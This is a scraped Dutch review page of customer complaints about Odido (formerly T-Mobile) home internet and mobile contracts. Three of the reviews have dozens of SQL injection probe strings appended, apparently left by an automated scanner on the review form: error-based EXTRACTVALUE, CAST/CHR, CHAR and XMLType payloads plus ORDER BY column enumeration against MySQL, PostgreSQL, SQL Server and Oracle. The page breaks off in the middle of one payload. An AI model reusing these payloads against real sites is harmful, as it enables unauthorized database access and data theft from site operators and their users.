Odido (voorheen t-mobile)

Alle reviews

Odido (voorheen t-mobile)

37% Zou hier weer kopen

Beoordelingen, klachten, ervaringen en reviews Schrijf een review

Lees hier onafhankelijke reviews, klachten en ervaringen. Wees op de hoogte waar u uw aankoop kunt doen of beoordeel zelf een winkel waar u een (online) aankoop heeft gedaan. Zo bepaalt tegenwoordig heel Nederland zelf welke winkels slecht en goed zijn!

Alle reviews (78)

 • Nog geen reviews!

  Ga op zoek naar bedrijven waar je ervaring mee hebt en schrijf er reviews over! Je reviews dragen bij aan een transparantere markt en zorgt voor betere betrouwbaarheid van bedrijven

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  T-Mobile Thuis (internet)

  I. Introductie
  T-Mobile is met recht een speciaal bedrijf te noemen. Helaas is het bijvoeglijk naamwoord ‘speciaal’ in deze context niet van positieve kleur. T-Mobile is uitzonderlijk, onderscheidend en opvallend slecht. Mocht je deze recensie (lees: persoonlijke ervaring en mening) niet verder willen lezen, neem dan het volgende advies van mij aan: begin niet aan een internet- of telefoonabonnement bij T-Mobile.

  II. Waar ging het mis?
  Als ik even globaal naar het bedrijf kijk, dan stel ik dat het mis is gegaan op het moment dat T-Mobile in 1996 is komen overwaaien naar Nederland vanuit de VS. In mijn persoonlijke geval ging het mis op een willekeurig moment: toevallig ongeveer 3 weken voor mijn verhuizing.

  Uit het niets werkte het vaste internet op geen enkel apparaat in huis meer. Hierop belde ik met de klantenservice van T-Mobile en heb ik te horen gekregen dat ze ernaar zouden kijken. Gelukkig kreeg ik wél een code voor gratis gebruik van het mobiele netwerk, zodat ik alsnog gewoon kon internetten. Fijne oplossing!

  Een weekje later is het mobiele internet op en ik besluit weer even contact te leggen om te kijken of het probleem al verholpen kan worden. De collega die ik nu spreek geeft aan dat de vorige collega de klacht niet heeft doorgezet – en dat er dus helemaal niet naar gekeken is. Ik kreeg weer een nieuwe voucher en er zou weer naar het probleem gekeken worden. Met minder hoop en frisse tegenzin accepteer ik de situatie en wacht ik het weer af.

  III. Waarom ben ik ontevreden?
  Na een week of 3 alleen maar internettoegang te hebben gehad via een mobiele hotspot was het tijd voor mijn verhuizing. In de weken naar de verhuizing toe heb ik regelmatig contact gelegd, helaas zonder resultaat. Op een gegeven moment had ik het opgegeven met het idee “dan maar geen internet in het oude huis, als het straks maar wél werkt in het nieuwe huis”.

  Tijdens de verhuizing had ik weinig tijd om er zelf steeds achteraan te bellen, dus deed ik dat ook een stuk minder. Op het moment dat ik mijn verhuizing doorgaf kreeg ik te horen: “het duurt twee weken om dit over te zetten”. Dat was wel even schrikken en tevens ook even slikken! Afijn, ook geaccepteerd.

  Vanuit de klantenservice kreeg ik het verzoek om alle apparatuur (lees: alle apparatuur) terug te sturen per post. Dit omdat het nieuwe huis een glasvezel aansluiting heeft en ik daar andere spullen voor nodig zou hebben. Voor het terugsturen ontving ik een label waar ik niet zelf voor hoefde te betalen. Ik heb alle apparatuur van T-Mobile netjes in de doos gedaan en zo snel mogelijk opgestuurd.

  De frustraties liepen al erg hoog op, maar ik had nog alle hoop en strijdlust om te zorgen voor een werkende internetverbinding. Met die gedachte heb ik, na ontvangst van een nieuw pakket van T-Mobile, een afspraak ingepland met een installateur.

  Op het moment dat de niet-representatieve (lees: petje, bodywarmer, sportbroek en geen T-Mobile kleding) bij mij thuis kwam, rolde hij met zijn ogen naar boven. Hij trof namelijk in het T-Mobile pakket alleen een “Mediaconverter” aan en géén modem. Uiteraard ben ik zelf geen installateur of internetexpert, dus wist ik zelf helaas niet van tevoren dat er een apparaat ontbrak. De installateur gaf aan dat ik maar beter de T-Mobile klantenservice kon bellen, want “ik kom helemaal van ver rijden en hier kan ik niks mee, man”. Volgens hem zou de klantenservice zorgen dat ik de volgende dag nog een modem in huis zou krijgen.

  Ik heb meteen het nummer van de klantenservice gedraaid en gevraagd of ze dit direct zouden kunnen regelen. De dame aan de lijn gaf aan dat het dom van mij was om “ook de modem terug te sturen” ondanks dat er in de mail “alle apparatuur” vermeld stond. Volgens haar had ik dit beter kunnen weten, maar ze zou het tóch voor mij oppakken en zorgen dat ik over uiterlijk 2 dagen een modem zou hebben. Is dat gelukt? Helaas niet.

  Ruim 2 weken en 5 telefoontjes verder hoor ik een klantenservice medewerker zeggen: “de modem is nog niet verstuurd, jouw bestelling staat namelijk on hold”. Toen brak mijn klomp en heb ik aangegeven alles terug te sturen en de gehele bestelling en het abonnement per direct te willen stopzetten. Ook dit ging moeizaam en de beloofde bevestiging van opzegging bleef dagenlang uit.

  IV. Hoe lang heeft het uiteindelijk geduurd?
  Alles bij elkaar heb ik zo’n 6 weken zonder internet gezeten. Uiteindelijk is het gelukt om het abonnement op te zeggen. Weliswaar met schokken en stoten, maar het is gelukt.

  V. Afsluiting
  Mocht je op zoek zijn naar een (mobiele) internetprovider, dan kan ik je T-Mobile van harte afraden. Het woord ‘speciaal’, wat ik aan het begin van mijn recensie gebruikt heb, kan ook vervangen worden door ‘treurig’. Zowel de klantenservice als de dienst zelf zijn uitermate slecht en niet representatief voor een bedrijf van deze omvang en status.

  Ik heb ook nog een mobiel abonnement lopen bij T-Mobile. De problemen die ik hiermee ervaar bewaar ik voor een toekomstige recensie. Één ding is in ieder geval zeker: dit abonnement zal ik zo snel als mogelijk opzeggen en vervolgens de overstap maken naar een betrouwbaardere provider.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  T-Mobile thuis

  Eerder deze week al een klacht ingediend aangaande het onrechtmatig verlengen van een jaar contract i.v.m. verhuizing. In juli 2022 een jaarcontract afgesloten bij T-Mobile Thuis. In april 2023 zijn we verhuist naar een ander woonadres.

  In juli 2023 zou ons contract verlopen zijn en het contract omgezet worden naar onbepaalde tijd en maandelijks opzegbaar. Op April hebben wij onze verhuizing online via T-Mobile bekend gemaakt, enkel een wijziging doorgegeven via mijn account van T-Mobile.

  Onlangs besloten buiten de contractperiode om over te stappen naar KPN. Gebruik gemaakt ook van de KPN overstap service. KPN benaderde ons om te melden dat wij aan een jaar contract vast zitten en dat ze niks kunnen doen. Dit was voor ons het moment dat we getriggerd waren dat ons contract na het wijzigen van ons adres onrechtmatig zonder ons akkoord verlengd is. Wellicht in geniepige kleine letters maar niet duidelijk zichtbaar en kenbaar gemaakt.

  Gister (4-8-2023) Shefraan van T-mobile gesproken. Verhaal uitgelegd en kon zich inleveren dat wij de kleine letters niet hadden gelezen en heeft ook toegezegd en per mail bevestigd dat de resterende afkoopsom die gegeneerd zal worden door T-Mobile gecrediteerd wordt.

  Vandaag 4-8-2023 gebeld door de collega van Shefraan, Bettina. Zij kwam mededelen met een gestrekt been dat wij een mail hebben gehad waar duidelijk is aangeven dat wij aan een jaar contract vast zitten aangezien wij een verhuizing hebben doorgegeven. Wij hebben geen mail ontvangen, wij zijn vooraf niet geïnformeerd c.q. niet duidelijk gemaakt dat dit de consequenties zijn. Volgens Bettina hebben zij zich aan de wettelijke regels gehouden. Naar ons inziens is dit een brutale, slinkse en misleidende manier om een klant te binden. Wees duidelijk in je communicatie!

  Ruim 15 jaar klant geweest bij T-Mobile mobiel, vanwege deze zeer slechte aftersales ook blij en bevestigend de juiste keuze gemaakt te hebben.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  T-Mobile Thuis

  Ik heb de abonnementen van T-Mobile mobiel en T-Mobiel thuis opgezegd. Ik stap over naar KPN en heb hiervoor de opzegservice ingeschakeld. Zojuist werd ik verrast met een telefoontje van KPN omdat jullie zonder overleg mijn contact hebben verlengd voor een jaar en de reden is omdat ik 4 maanden geleden verhuisd ben! Ik vind dit een hondsbrutale manier van klantenbinding en vraag mij ook af of dit überhaupt juridisch bindend is.

  Het siert jullie tevens niet om op deze manier klanten te binden! Je kan hiermee ook wel vergeten dat ik na ruim 15 jaar klant te zijn bij jullie niet meer terugkom.

  PS: rechtsbijstand is hierover op de hoogte gebracht.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Zakelijk abonnement

  11-2022 geprobeerd een zakelijk abonnement af te sluiten.
  Ging niet, had mij vergist abonnement bij KPN liep nog.
  Niks meer over gehoord geen sim kaart ontvangen.
  Maar deze maand zag ik op mijn zakelijke rekening dat ze wel geld af aan het schrijven zijn.
  Gebeld met de vraag waarom ze geld af aan het schrijven zijn.
  Was vanwege mijn abonnement???

  Ik heb ze uitgelegd hoe en wat.
  Dik een kwartier in de wacht gestaan.
  Antwoord was helaas kon niks voor mij doen bedenktijd was over.
  Ik heb duidelijk aangegeven dat ik daar niet met eens ben.
  Aangegeven dat ik niets over het abonnement heb ontvangen geen sim kaart heb, waarmee ik niet eens gebruik kan maken van het zogenaamde abonnement.
  Maar helaas kon evengoed niks doen.
  Dus ik weer aangegeven dat het zogenaamde zakelijke abonnement heeft niet eens het goede nummer heeft.
  Na ze kon wel zogenaamd zorgen dat ik het abonnement met nummer behoud zou kunnen krijgen.
  Weer aangegeven dat het niet mogelijk is omdat ik inmiddels een abonnement bij KPN heb lopen, omdat ik er vanuit ging dat het abonnement bij hun niet kon worden afgesloten.

  Maar helaas mocht niet baten was niets meer mogelijk.

  Dit pik ik niet, heb alles via mijn bank laten terugstorten en hun geblokkeerd.

  Ze zoeken het zich maar uit, dat ze er maar een rechtzaak van maken.
  Kan mij niet voorstellen dat ze dat rond gaan krijgen.
  Dit soort praktijken mogen ook hun niet doen.
  Is pure oplichting....

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  2fa word zonder toestemming aangezet en kan niet worden uitgezet, maar als je met meer mensen moet kunnen inloggen is dat dus niet meer mogelijk.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Tmobile thuis tv en internet

  Verschrikkelijk slechte communicatie en de kwaliteit van de te leveren diensten zijn erg slecht. Betaal voor niks op het moment en zit er helaas nog aan vast...

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Geprobeerd een telefoon te bestellen bij T-Mobile

  Bij abonnement verlenging gekozen voor een nieuwe telefoon. Tijdens de online bestelprocedure wordt er gevraagd of ik de telefoon wil laten opsturen of, de snelste optie!, zelf ophalen in de winkel. Want de winkels hebben voorraad zo wordt er op de website geschreven.
  Nadat ik de bestelling heb afgerond krijg ik een mail met de vervolgstappen, nl:
  1. Bestelling is ontvangen
  2. Bestelling ophalen in de T-Shop.
  We proberen de destreffende winkel nog op voorhand te bellen om te vragen of het toestel daadwerkelijk op voorraad is, echter er wordt niet opgenomen. Dus dan maar naar de winkel zelf.
  Eenmaal aangekomen in de winkel wordt ons snel duidelijk gemaakt dat de T-Shops helemaal geen voorraad hebben, er zit tenslotte een hele grote sticker op de ruit dat de winkel geen telefoons op voorraad hebben... (alsof je die sticker kunt zien als je een online bestelling plaatst).
  Het toestel wordt nu besteld en wordt naar de winkel verstuurd en daarna kan ik hem pas ophalen!
  Maar ik had toch net gelezen dat jullie toestellen op voorraad hebben en dat zelf ophalen de snelste optie was? Als het toestel toch naar jullie winkel moet worden verstuurd dan kunnen ze hem beter direct naar mijn huis sturen, toch? Ja, sorry meneer maar ik kan er ook niets aan doen, moet u even bellen.
  Dus dan maar bellen om de bestelling te wijzigen van ophalen naar verzenden.
  Nee, sorry meneer ik kan helaas de bestelling niet wijzigen. Je kunt wel de bestelling opnieuw doen dan.... bla bla bla bla
  WAT EEN EIKELS!!! Op de website zeggen ze A en op de winkelruiten plakken ze stickers met B.
  Wees dus gewaarschuwd!!!

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Internet thuis

  Internet valt om de 10 minuten uit, om zwaar modeloos van te worden.
  Echt waardeloos en nog maals tientallen keren waardeloos.
  Mijn bedoeling is weer terug te gaan naar Ziggo nooit geen klachten daar gehad.

  DnJu') AND EXTRACTVALUE(6429,CONCAT(0x5c,0x71787a7a71,(SELECT (ELT(6429=6429,1))),0x717a717671)) AND ('mXmY'='mXmY

  DnJu' AND EXTRACTVALUE(6429,CONCAT(0x5c,0x71787a7a71,(SELECT (ELT(6429=6429,1))),0x717a717671)) AND 'KiGH'='KiGH

  DnJu) AND EXTRACTVALUE(6429,CONCAT(0x5c,0x71787a7a71,(SELECT (ELT(6429=6429,1))),0x717a717671)) AND (4805=4805

  DnJu AND EXTRACTVALUE(6429,CONCAT(0x5c,0x71787a7a71,(SELECT (ELT(6429=6429,1))),0x717a717671))

  DnJu AND EXTRACTVALUE(6429,CONCAT(0x5c,0x71787a7a71,(SELECT (ELT(6429=6429,1))),0x717a717671))-- WwAx

  DnJu') AND 5697=CAST((CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (5697=5697) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)) AS NUMERIC) AND ('uzZw'='uzZw

  DnJu' AND 5697=CAST((CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (5697=5697) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)) AS NUMERIC) AND 'QeWQ'='QeWQ

  DnJu) AND 5697=CAST((CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (5697=5697) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)) AS NUMERIC) AND (2490=2490

  DnJu AND 5697=CAST((CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (5697=5697) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)) AS NUMERIC)

  DnJu AND 5697=CAST((CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (5697=5697) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)) AS NUMERIC)-- setU

  DnJu') AND 6760 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6760=6760) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(118)+CHAR(113))) AND ('vVBg'='vVBg

  DnJu' AND 6760 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6760=6760) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'ZPEm'='ZPEm

  DnJu) AND 6760 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6760=6760) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(118)+CHAR(113))) AND (1091=1091

  DnJu AND 6760 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6760=6760) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(118)+CHAR(113)))

  DnJu AND 6760 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6760=6760) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(118)+CHAR(113)))-- bPZN

  DnJu') AND 9017=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9017=9017) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND ('vRKL'='vRKL

  DnJu' AND 9017=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9017=9017) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'HMie'='HMie

  DnJu) AND 9017=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9017=9017) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND (2310=2310

  DnJu AND 9017=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9017=9017) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)

  DnJu AND 9017=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9017=9017) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)-- fIFl

  DnJu') ORDER BY 1-- llyM

  DnJu' ORDER BY 1-- VSjg

  DnJu) ORDER BY 1-- htie

  DnJu ORDER BY 1-- oirJ

  DnJu ORDER BY 1-- BKGJ

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Internet Thuis

  Rond juni 2022 twee maanden zonder internet gezeten. 5x iemand van Guidion langs geweest die zei dat hij het had opgelost aangezien T-Mobile niemand van KPN volgens hun procedure mocht langssturen. Maar het kastje van KPN was stuk. Uiteindelijk kwam de 6e keer iemand van KPN langs, binnen 5 minuten probleem gefixt. Aansluiting glasvezelkabel moest opnieuw gelast worden aangezien de verbinding stuk was. Nu sinds zondag 12 maart 2023 weer hetzelfde probleem. Ik krijg twee medewerkers aan de telefoon die mij beloven om iemand van KPN langs te sturen. Maar KPN neemt geen contact op, ik vandaag weer bellen en is het overruled door de technische dienst van T-Mobile omdat er per se iemand van Guidion eerst moet langskomen volgens hun procedure. Dus nu ga ik straks weer naar huis om te wachten op een 'timmerman' die een lekkende kraan moet gaan repareren. Om vervolgens te horen dat het is opgelost en dat nog een keer of 4 doorgaat voordat ik iemand van KPN mag ontvangen. Het wordt weer feest, maar niet heus. T-Mobile schaam jullie diep diep diep.

  iPoJ') AND EXTRACTVALUE(4043,CONCAT(0x5c,0x7171787a71,(SELECT (ELT(4043=4043,1))),0x7171627171)) AND ('wYmC'='wYmC

  iPoJ' AND EXTRACTVALUE(4043,CONCAT(0x5c,0x7171787a71,(SELECT (ELT(4043=4043,1))),0x7171627171)) AND 'bQvn'='bQvn

  iPoJ) AND EXTRACTVALUE(4043,CONCAT(0x5c,0x7171787a71,(SELECT (ELT(4043=4043,1))),0x7171627171)) AND (1410=1410

  iPoJ AND EXTRACTVALUE(4043,CONCAT(0x5c,0x7171787a71,(SELECT (ELT(4043=4043,1))),0x7171627171))

  iPoJ AND EXTRACTVALUE(4043,CONCAT(0x5c,0x7171787a71,(SELECT (ELT(4043=4043,1))),0x7171627171))-- Hhqj

  iPoJ') AND 2363=CAST((CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2363=2363) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)) AS NUMERIC) AND ('CkhJ'='CkhJ

  iPoJ' AND 2363=CAST((CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2363=2363) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)) AS NUMERIC) AND 'VDMv'='VDMv

  iPoJ) AND 2363=CAST((CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2363=2363) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)) AS NUMERIC) AND (7106=7106

  iPoJ AND 2363=CAST((CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2363=2363) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)) AS NUMERIC)

  iPoJ AND 2363=CAST((CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2363=2363) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)) AS NUMERIC)-- IBhk

  iPoJ') AND 2313 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2313=2313) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113))) AND ('PABe'='PABe

  iPoJ' AND 2313 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2313=2313) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113))) AND 'iVkM'='iVkM

  iPoJ) AND 2313 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2313=2313) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113))) AND (8796=8796

  iPoJ AND 2313 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2313=2313) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)))

  iPoJ AND 2313 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2313=2313) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)))-- puzR

  iPoJ') AND 8524=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (8524=8524) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND ('SFbm'='SFbm

  iPoJ' AND 8524=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (8524=8524) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'nYEq'='nYEq

  iPoJ) AND 8524=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (8524=8524) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND (1317=1317

  iPoJ AND 8524=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (8524=8524) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)

  iPoJ AND 8524=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (8524=8524) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- peyk

  iPoJ') ORDER BY 1-- hWpl

  iPoJ' ORDER BY 1-- shDc

  iPoJ) ORDER BY 1-- WZYR

  iPoJ ORDER BY 1-- nDks

  iPoJ ORDER BY 1-- upcJ

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  T-Mobile Thuis

  Hoera dinsdag 7 maart 2023 monteur van Guidion komt plaatsing verzorgen van het Modem en 2 TV-kastjes + wiffi versterker. Alles was al voorbereid dus een eitje! Internet opgestart OKé nu nog de beide TV's Sorry maar ik nog even naar buiten om iets over te zetten. Bij terugkomst nog even de beide TV's afstellen, maar geen LAN-verbinding, belle met .. Antwoord het kan wel een uurtje duren voordat de MAC gegevens zijn ingevoerd. Monteur weg, na 2 uur zelf zelf getracht de het systeem werend te krijgen, dus niet. Gebeld met T-mobile klanten service en na vele vragen te hebben beantwoord het probleem naar voren gebracht. Antwoord, meneer het kan wel 24 uur duren. Dan voel je al er klopt iets niet!! Woensdag voor 08.30 uur weer klanten service gebeld, snel verbinding, antwoord was " het ligt bij ons en de afdeling is er mee bezig, U wordt terug gebeld als alles voor elkaar is" 's Middag naar T- Mobile Amersfoort gegaan met het verzoek om te snelle actie over te gaan zodat wij weer TV konden kijken. Meneer voor 16.30 uur wordt U terug gebeld. Wis en waarachtig ik werd terug gebeld met het antwoord " Wij kunnen niets meer voor u doen zoek maar wat anders. Gedaan , ga terug naar KPN en 21 maart vindt plaatsing plaats. T-Mobile van mijn zijde totaal geen positieve reactie(s) meer.

  gmjc') AND EXTRACTVALUE(5550,CONCAT(0x5c,0x7176707071,(SELECT (ELT(5550=5550,1))),0x71626a7a71)) AND ('wBfs'='wBfs

  gmjc' AND EXTRACTVALUE(5550,CONCAT(0x5c,0x7176707071,(SELECT (ELT(5550=5550,1))),0x71626a7a71)) AND 'CJrL'='CJrL

  gmjc) AND EXTRACTVALUE(5550,CONCAT(0x5c,0x7176707071,(SELECT (ELT(5550=5550,1))),0x71626a7a71)) AND (5427=5427

  gmjc AND EXTRACTVALUE(5550,CONCAT(0x5c,0x7176707071,(SELECT (ELT(5550=5550,1))),0x71626a7a71))

  gmjc AND EXTRACTVALUE(5550,CONCAT(0x5c,0x7176707071,(SELECT (ELT(5550=5550,1))),0x71626a7a71))-- CUcE

  gmjc') AND 8663=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8663=8663) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC) AND ('eaEE'='eaEE

  gmjc' AND 8663=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8663=8663) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC) AND 'Qeva'='Qeva

  gmjc) AND 8663=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8663=8663) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC) AND (6727=6727

  gmjc AND 8663=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8663=8663) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC)

  gmjc AND 8663=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8663=8663) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC)-- zIer

  gmjc') AND 7535 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7535=7535) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(122)+CHAR(113))) AND ('LAql'='LAql

  gmjc' AND 7535 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7535=7535) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'qzUB'='qzUB

  gmjc) AND 7535 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7535=7535) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(122)+CHAR(113))) AND (9869=9869

  gmjc AND 7535 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7535=7535) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(122)+CHAR(113)))

  gmjc AND 7535 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7535=7535) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(122)+CHAR(113)))-- dpQT

  gmjc') AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6916=6916) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ('zWpJ'='zWpJ

